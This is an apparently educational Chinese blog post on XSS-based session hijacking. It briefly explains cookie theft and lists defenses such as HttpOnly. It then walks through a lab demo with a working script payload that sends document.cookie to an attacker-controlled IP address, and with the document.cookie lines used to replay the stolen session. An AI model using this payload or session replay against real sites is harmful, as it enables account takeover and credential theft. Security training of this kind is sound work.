XSS 攻防案例

XSS 攻防案例

固定会话

原理

​ 用户会话令牌利用Cookie 来实现的,Cookie 是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险。

​ 可以利用XSS 攻击窃取到浏览器里的Cookie 信息。

​ 由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。

窃读 Cookie

username=admin;userid=1;PHPSESSID=b09m2i6ppthmqqg26no26co6m3

欺骗

document.cookie = 'username=admin';
document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=b09m2i6ppthmqqg26no26co6m3';

影响

  • 黑客可以利用Cookie 信息,也就是身份凭据,登录后台;
  • 即使管理员注销登录,会话依然有效;
  • 即使管理员修改了密码,会话依然有效。

防御

  • 根据实际情况采用“单点登录”;
  • 采用Session 机制;
  • 设置token 值;
  • 对Cookie 数据,设置HttpOnly 属性;

固定会话攻击实例/XSS盲打

攻击代码

原始代码

<script>document.write('<img src="http://10.9.47.120/'+document.cookie+'">');</script>

引号和分号需要进行转义

<script>document.write(\'<img src=\"http://10.9.47.120/\'+document.cookie+\'\">\')\;</script>

攻击原理

  • 当受害者浏览器加载包含这段代码的页面时,JavaScript 代码会执行。

  • JavaScript 会动态地创建一个<img>标签,并将其添加到页面中。

  • <img>标签的src属性指向了http://10.9.47.120/,后面紧跟着用户的 cookie 信息document.cookie

  • 浏览器会尝试加载这个图像,实际上是向http://10.9.47.120/发送了一个 GET 请求,其中包含了用户的 cookie 信息。

  • http://10.9.47.120/服务器,会记录或利用这些 cookie 信息

image-20231109132944510

攻击实施

攻击者上传 XSS 代码,并开启 http server 服务监听

image-20231109131523367

image-20231109133235267

受害者访问包含 XSS 代码的页面

image-20231109131625684

攻击者监听到包含受害者 Cookie 的请求

username=admin;%20userid=1;%20PHPSESSID=o81a755q490343a4cf6bgbjb91

image-20231109131656535

伪造登录

document.cookie = 'username=admin';
document.cookie = 'userid=1';
document.cookie = 'HPSESSID=o81a755q490343a4cf6bgbjb91';

image-20231109133749083

cookie 中有了伪造的信息,此时访问后台,无需验证即可登录

image-20231109133836422

image-20231109133921764

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值